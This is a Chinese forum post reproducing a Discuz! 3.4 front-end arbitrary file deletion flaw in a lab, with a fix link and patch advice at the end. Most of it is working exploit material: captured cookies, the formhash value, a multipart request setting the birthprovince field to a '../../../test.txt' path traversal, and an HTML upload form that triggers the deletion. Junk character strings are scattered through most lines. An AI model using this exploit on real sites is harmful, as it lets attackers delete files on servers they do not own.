|
|
2 o; }! t1 }; J7 |% z1 j# ]7 \$ C- y4 \+ \& l
前言:9月29日,Discuz修复了一个前台任意文件删除的漏洞,相似的漏洞曾在2014年被提交给wooyun和discuz官方,但是修复不完全导致了这次的漏洞。网上很多说官方3.4版本已修复,但我用环境的是vulhub上3.4版本。所以不知道3.4修复没修复直接复现一下。
2 y3 |1 \- { i8 X6 z7 D4 A+ X影响版本:Discuz < =3.4 环境- |7 D8 g4 f9 h. o- X. L
9 b+ C, S* m- \
复现过程:首先在discuz目录下新建一个test.txt文件,到时候删除用。
8 m) d1 d9 P. y( f3 H2 q新建test.txt6 [% n" A7 f4 Q2 c0 y q$ F
访问:http://192.168.220.131/home.php?mod=spacecp,然查审查元素,查看formhash的值,然后复制。
1 v/ u, S% S) d: ^, r4 Q4 B2 {) v# j
! B% A* ~- f- V& j x4 {- O
% n( h( Y$ R, l查看formhash8 Q# c) U% \/ U
利用burp抓包,获取cookie4 u, c w- a$ k, f w7 Z* E
, a7 G6 H3 i# W6 c6 R* L6 m
5 l2 L6 |2 @ m+ _- P5 }) D* K+ j7 R6 n
8 w% p1 Y3 z$ N/ z4 ^. n6 |; v; J+ _, Z `
抓取cookie
5 Z5 R$ R+ l3 D
6 o; [0 Z. C# h. o1 e; D发送下面数据包:修改cookie,formhash,还有删除的文件8 q7 O; [# c9 k, t# C/ ]2 N
POST /home.php?mod=spacecp&ac=profile&op=base HTTP/1.1; j4 g, V; Q1 j. C5 V) `
Host: localhost
8 @! w& F [1 Y/ n( Y W+ ^Content-Length: 367
, H D' o9 I" b' ICache-Control: max-age=0" a* y$ U( ^9 L; [# E3 e
Upgrade-Insecure-Requests: 1" A3 k' X5 D, E) l1 G4 Z# `
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryPFvXyxL45f34L12s
/ g8 F" Q: ~: o* O e! i+ YUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36
. r- G, w! {2 R' ZAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8; s1 i3 d& O! _$ B2 M" I
Accept-Encoding: gzip, deflate7 Q' v( p: p* |1 s: }) W
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6
" X' [" W7 j8 k- j# o' q% [! yCookie: CmcL_2132_saltkey=b9yKqToA; CmcL_2132_lastvisit=1577934646; CmcL_2132_sid=I21Fam; CmcL_2132_lastact=1577951222%09misc.php%09patch; CmcL_2132__refer=%252Fhome.php%253Fmod%253Dspacecp; CmcL_2132_seccode=1.1f5dbc9f8f51267031; CmcL_2132_ulastactivity=f7c74D32skNeZM0YcFOOaQUi7XmBcai6jjji8MGC7px2%2BTiSN9qM; CmcL_2132_auth=8bf5qD72m1LL4vx%2BXQAGHjNEfio4ELQqrhkkrwz%2FdcuiSxXlRhnYfpwxloZj5lqVp6zUrThf%2FVYOcWS9xQwm; CmcL_2132_lastcheckfeed=2%7C1577938266; CmcL_2132_lip=192.168.220.1%2C1577938056, H" N J3 T+ z2 X
Connection: close
$ }" a- Z1 k3 u: H% H, ~ n------WebKitFormBoundaryPFvXyxL45f34L12s
7 p% Y. u" H1 RContent-Disposition: form-data; name="formhash"
( L& y) L9 l% M& |4 W) {7 {& d84a7f376
, c: U9 r L4 v------WebKitFormBoundaryPFvXyxL45f34L12s4 ^+ p7 H( ^0 O1 g
Content-Disposition: form-data; name="birthprovince"
2 k, K; l/ w% {) c. O../../../test.txt* o' H I' a o8 R
------WebKitFormBoundaryPFvXyxL45f34L12s
6 a% h+ @/ t& O @, o4 _, ~Content-Disposition: form-data; name="profilesubmit"4 C3 p3 v% t0 ~& t8 ]# x8 |
1, ]7 N$ U3 W: m, L, [- T r
------WebKitFormBoundaryPFvXyxL45f34L12s--* h; C/ n k V8 N. S9 V. T! n6 E
发送删除的数据包
3 W3 ~8 P: p9 Z刷新页面,查看出生地就会显示成下图所示的状态:1 ^! h8 q4 y1 j" ~1 a
数据成功写入, E" ?8 o2 I0 x; G7 {; m
9 J" C4 f7 O7 A( U* l) d o0 L, f6 Y! A
说明数据已经进入数据库:
* J6 `) x; E; Y" A+ w5 M! L9 l- V然后,新建一个upload.html,代码如下,将其中的ip改成discuz的域名,[form-hash]改成你的formhash:3 h9 a2 f) o" O6 U" F
<form action="http://192.168.220.131/home.php?mod=spacecp&ac=profile&op=base&deletefile[birthprovince]=aaaaaa"method="POST" enctype="multipart/form-data">
" r) u6 t$ g& u" J& p<input type="file"name="birthprovince" id="file" />0 S/ J. L9 s; h% H2 u: h9 T7 t
<input type="text"name="formhash" value="84a7f376"/></p>- j6 {" Z2 _" j5 O* x" C$ g/ P+ ?& X
<input type="text"name="profilesubmit" value="1"/></p>
6 M$ X! k0 G' a! M<input type="submit"value="Submit" />
, c1 a% W) W' U" Q' J& s1 e</from>
& j" s' l, r6 Q. h7 O5 K
8 v Q3 n2 X5 F- [5 W5 }% L' R8 F& q" m/ [
% T( K0 Q1 d: H( p
4 _6 d# T6 h, \4 S+ v9 [
6 u* Z/ y8 Q1 L2 b. f4 O1 }
或者直接构建数据包:" q* ^; n" S1 }. O. p
POST /home.php?mod=spacecp&ac=profile&op=base&profilesubmit=1&formhash=84a7f376 HTTP/1.1 O& m K1 Q; ^( r: c, ` n3 O
Host: 192.168.220.1310 y2 ~" C# \$ O" H1 j; `* r2 j
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0
" `6 H# j4 g$ p& |* K( p: L! yAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8) f7 H+ h- `' z4 E; X& q
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.25 q, m& N7 j- R* h
Accept-Encoding: gzip, deflate
# S) N. s( C0 f8 Z7 Q% P1 JContent-Type: multipart/form-data; boundary=---------------------------123821742118716& O% w \; {8 w! ~) f* u
Content-Length: 91989
. J- P6 r. V) ~7 \( vConnection: close9 |& {; \" Y6 ?7 \! [/ [. I
Cookie: CmcL_2132_saltkey=b9yKqToA; CmcL_2132_lastvisit=1577934646; CmcL_2132_sid=I21Fam; CmcL_2132_lastact=1577951222%09misc.php%09patch; CmcL_2132__refer=%252Fhome.php%253Fmod%253Dspacecp; CmcL_2132_seccode=1.1f5dbc9f8f51267031; CmcL_2132_ulastactivity=f7c74D32skNeZM0YcFOOaQUi7XmBcai6jjji8MGC7px2%2BTiSN9qM; CmcL_2132_auth=8bf5qD72m1LL4vx%2BXQAGHjNEfio4ELQqrhkkrwz%2FdcuiSxXlRhnYfpwxloZj5lqVp6zUrThf%2FVYOcWS9xQwm; CmcL_2132_lastcheckfeed=2%7C1577938266; CmcL_2132_lip=192.168.220.1%2C1577938056
p1 o5 F/ Y) H& |" I: [/ s: dUpgrade-Insecure-Requests: 1% z1 Y. i+ R% ?/ [, c
-----------------------------123821742118716; v2 _ X+ W2 K/ q- ] [7 Q1 {
Content-Disposition: form-data; name="birthprovince"; filename="0.jpg"0 w+ F; z. b: H
Content-Type: image/jpeg
+ h, a3 o; Y1 R. W$ I, j6 mzerba(这里写啥都可以)
6 n$ @% ] K8 `1 _7 R-----------------------------123821742118716--4 q* g5 x" } ~( d, ^' o% y, G
5 U7 r* L: l7 @. h& [% F8 ^8 ~# d8 @! Y: [' I E- i
8 B9 W' u* \8 k P: P) v
4 Y5 r& k3 b7 W7 n$ d H5 S5 p! M7 A
. ^& T% c* b. p) t; {) j$ D s# y
# a- e( }# _+ Q) r+ [7 _6 k$ v8 K2 F
1 Y9 T& |* r% |1 R
9 B/ y4 _& a% E5 a/ h) g7 N9 t8 Z8 y0 `; }; y1 G+ M3 B' y
进去discuz看看,可以看到,test.txt文件已经被删除了。
0 \- n8 ?! Z! M0 ~! _
4 I6 t1 |0 M' s; n4 F( D5 c! j$ E" v. [
9 b4 q6 O& y$ @3 a
% ?7 `. I6 B# w
- \! @- A8 r( c0 l$ h/ _3 z$ _3 m* I修复建议:https://gitee.com/ComsenzDiscuz/DiscuzX/commit/7d603a197c2717ef1d7e9ba654cf72aa42d3e5741 w$ N, S5 F2 z0 c& {1 B
编辑upload/source/include/spacecp/spacecp_profile.php文件,删除和unlink相关代码。
' F1 i: M" l, d1 D# `' t/ K a+ r) m# M* K1 w. r: |
! w% h! \% a. m
' G, n2 `% ~7 \' H; a" f
7 }. [: X! q2 M2 s! i
- Z% C( @- m' ]4 H" V& C- I
$ t5 d" ]" @ {+ H
5 O8 }% A. Y5 O" f
4 a5 y9 O6 t/ U2 G) Y/ ?1 J/ G
4 L" n r9 l% L( x% O( ?
|
|
窥视卡
雷达卡
发表于 2022-6-25 08:59:09
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
千斤顶
照妖镜